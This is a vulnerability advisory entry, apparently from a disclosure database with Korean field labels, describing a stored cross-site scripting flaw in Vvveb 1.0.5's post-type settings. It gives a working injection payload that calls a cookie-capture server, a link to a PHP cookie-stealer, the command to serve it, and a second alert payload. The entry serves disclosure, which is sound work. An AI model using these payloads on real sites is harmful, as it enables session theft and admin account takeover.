| 제목 | Vvveb 1.0.5 Cross Site Scripting |
|---|
| 설명 | Description
The endpoint at [/vadmin123/index.php?module=settings/post-types] is vulnerable to XSS. When a payload is applied here, it makes the whole site and every endpoint access through [/vadmin123/] vulnerable to attack.
This vulnerability can be exploited as long as you either a “Site Administraor”, “Administrator” or “Super Administrator”.
A well crafted XSS payload can be used to harvest cookies from multiple site admins, editors, vendors and everyone else.
Reproduce
Login as a moderator with “Site Administrator” role, open the following endpoint:
/vadmin123/index.php?module=settings/post-types
On top left, click on “Add type” button. From here you can add a post type, in [name="post_type[type]"] field you can enter a payload like the following:
"><img src='http://127.0.0.1:1718/capture.php'>
This payload will execute anytime anyone logs in through the admin panel [/vadmin123/], it executes malicious JavaScript used for stealing cookies silently.
To setup a cookie stealer server, you can save the following PHP script as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Start a PHP server to serve it:
$ php -S x.x.x.x:1718
Can also be exploited with:
<img/src=x onerror=alert(2025)> |
|---|
| 원천 | ⚠️ https://hkohi.ca/vulnerability/11 |
|---|
| 사용자 | 0xHamy (UID 88518) |
|---|
| 제출 | 2025. 07. 29. PM 08:47 (9 개월 ago) |
|---|
| 모더레이션 | 2025. 08. 04. AM 08:27 (5 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 318647 [givanz Vvveb 까지 1.0.5 Add Type post-types 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|